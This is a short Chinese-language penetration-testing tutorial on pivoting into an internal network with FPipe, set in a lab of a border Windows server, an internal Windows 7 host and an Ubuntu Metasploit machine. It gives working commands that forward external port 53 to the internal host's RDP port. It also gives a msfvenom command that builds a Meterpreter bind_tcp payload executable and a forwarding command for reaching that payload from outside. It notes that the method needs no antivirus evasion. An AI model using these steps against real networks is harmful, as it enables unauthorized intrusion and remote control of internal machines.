目录
0x01 FPipe介绍
0x02 端口转发
0x03 msf正向上线
注:
边界机器 win08 192.168.222.175
内网机器 win7 192.168.222.137
msf机器 Ubuntu 192.168.222.177
0x01 FPipe介绍
FPipe即forward pipe,在两个端口中间建立一个管道,来实现流量的转发,一般用于内网机器不能正常上网的情况,而且不需要考虑免杀,但是必须要有边界机器,它不仅支持TCP流量的转发,还支持UDP的。

0x02 端口转发
将来自外部53端口的流量,通过本地的53端口转发到内网的3389端口
fpipe.exe -l 53 -i 0.0.0.0 -s 53 -r 3389 192.168.222.137

然后回到本地来远程连接就可以了 

0x03 msf正向上线
这里我们使用bind型的payload,保证让无法正常上网的内网主机也能正常反弹shell
正常生成一个马
msfvenom -p windows/x64/meterpreter/bind_tcp lport=53 -f exe >> 123.exe

之后去边界机器执行转发
fpipe.exe -l 53 -i 0.0.0.0 -s 53 -r 53 192.168.222.137

在内网机器上运行我们的马

回到Ubuntu上进行监听


这里的Died是生成的马有问题,之后换一下payload就可以搞定了,这个不必在意

根据实际情况来进行使用就ok了。
原作者:无心的梦呓
|